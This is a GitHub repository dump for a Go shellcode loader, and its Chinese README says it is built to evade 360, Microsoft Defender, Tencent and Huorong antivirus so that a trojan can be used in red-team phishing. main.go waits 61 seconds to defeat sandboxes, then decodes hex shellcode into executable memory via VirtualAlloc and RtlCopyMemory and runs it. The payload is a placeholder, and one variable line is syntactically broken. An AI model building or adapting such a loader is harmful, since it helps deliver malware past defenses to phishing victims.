├── 20211210165105.png ├── 20211210165311.png ├── README.md └── main.go /20211210165105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binganao/golang-shellcode-bypassav/1592c2286894bfa4658e932ccc5d59ff82032476/20211210165105.png -------------------------------------------------------------------------------- /20211210165311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binganao/golang-shellcode-bypassav/1592c2286894bfa4658e932ccc5d59ff82032476/20211210165311.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # golang-shellcode-bypassav 2 | 使用go语言免杀360、微软、腾讯、火绒 3 | 4 | 最近打红队,想搞个木马钓鱼用,刚好最近在学习 Go 语言便研究了一下 Golang 的免杀。免杀效果大概是这个样子。 5 | 6 | ![杀毒以及上线](https://github.com/binganao/golang-shellcode-bypassav/raw/main/20211210165105.png) 7 | 8 | ![微步分析](https://github.com/binganao/golang-shellcode-bypassav/raw/main/20211210165311.png) 9 | 10 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/hex" 5 | "syscall" 6 | "time" 7 | "unsafe" 8 | ) 9 | 10 | const ( 11 | MEM_COMMIT = 0x1000 12 | MEM_RESERVE = 0x2000 13 | PAGE_EXECUTE_READWRITE = 0x40 14 | ) 15 | 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") 21 | code = "fc4883e4f0e8c..." //16进制字符串代码 22 | decode1 "shellcode here" 23 | ) 24 | 25 | func main() { 26 | 27 | time.Sleep(61 * time.Second) 28 | 29 | decode, _ := hex.DecodeString(decode1) 30 | xor_code := decode 31 | 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_code)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_code[0])), uintptr(len(xor_code))) 37 | if err != nil && err.Error() != "The operation completed successfully." { 38 | syscall.Exit(0) 39 | } 40 | syscall.Syscall(addr, 0, 0, 0, 0) 41 | 42 | } 43 | --------------------------------------------------------------------------------